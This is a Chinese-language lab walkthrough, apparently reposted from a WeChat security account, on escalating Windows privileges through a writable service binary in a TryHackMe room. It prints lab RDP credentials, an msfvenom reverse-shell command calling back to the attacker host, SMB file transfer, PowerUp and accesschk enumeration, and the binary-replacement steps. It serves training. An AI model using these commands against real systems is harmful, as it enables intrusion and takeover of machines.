Windows提权之错误的服务权限(filepermsvc)

admin 2023年6月16日09:02:49评论24 views字数 1482阅读4分56秒阅读模式

点击上方蓝字关注我们

0x00:在线漏洞平台利用

本次的在线漏洞平台是Try hack me具体链接为https://tryhackme.com/room/windows10privesc。可以使用平台所提供的网页kali版,或者是用自己kali连到他们内网里面都可。

攻击机: kali ip 10.4.37.12

目标机器:windows10 ip 10.10.143.152

Windows提权之错误的服务权限(filepermsvc)


首先使用xfreerdp进行远程连接

命令: xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.143.152



0x01:制作反弹shell+传送到目标机器

为了控制一波我们的windows10,我们得先在kali本地制作一个反弹shell先。

命令:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.4.37.12 LPORT=667 -f exe -o reverseshell.exe

Windows提权之错误的服务权限(filepermsvc)

1








关于传送的到目标机器可以用kali自带的smbserver

命令: sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .

Windows提权之错误的服务权限(filepermsvc)

1








然后在我们的windows10的CMD命令行模式下输入

命令:copy \10.4.37.12kalirevershell.exe C:PrivEscreverseshell.exe

Windows提权之错误的服务权限(filepermsvc)

1








然后去到我们刚才存放的地方,记得提前在kali处打开波端口。一个点击就能获得了。

Windows提权之错误的服务权限(filepermsvc)


0x03:查找特别的服务

本次会用到两个工具PowerUp.ps1和另外一个accesschk.exe

PowerUp:https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1

Accesschk.exe: https://docs.microsoft.com/zh-cn/sysinternals/downloads/accesschk

Accesschk说明书也在同一页

1








由于该靶机已经提前帮我们准备好这两个文件了,如果是在实战中可以用上面的方法传输文件。这里先使用PowerUp.ps1

Windows提权之错误的服务权限(filepermsvc)

1








先进入powershell模式,然后用.  .PowerUp.ps1加载,最后用Invoke-AllChecks启动检测

Windows提权之错误的服务权限(filepermsvc)

1








可以找到一个特别的服务叫filepermsvc,同时startName时LocalSystem具有更高的权限,我们的目标就是利用它。

Windows提权之错误的服务权限(filepermsvc)

1








当然在利用前建议使用accesschk.exe看看目前用户是否具有执行权,否则就很尴尬了。这里可以看到目前用户user 具有RW权限即可读可写可更改

命令:accesschk.exe /accepteula(自动接收许可协议,记得一定加上去,否则想想会自动弹出一个是否接收许可协议,就很尴尬了)

-q=忽略banner

-u=忽略错误

-v=详细信息

-w=只显示拥有可写权的对象

后面的路径时根据PowerUp.ps1所提供的

Windows提权之错误的服务权限(filepermsvc)

1








那我们的机会就来了,可以把前面的反弹shell,复制到服务的.exe里面去,顺便把它改名为filepermservice.exe 然后重新启动该服务,因为具有更高的权限,理论上来讲是会反弹一个更高权限的shell

Windows提权之错误的服务权限(filepermsvc)

1








这里由于是靶机我直接在CMD下执行net start 重启命令,然后提前开启nc成功接收到一个更高权限的shell

Windows提权之错误的服务权限(filepermsvc)

原文始发于微信公众号(神隐攻防实验室):Windows提权之错误的服务权限(filepermsvc)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月16日09:02:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Windows提权之错误的服务权限(filepermsvc)https://cn-sec.com/archives/787395.html

发表评论

匿名网友 填写信息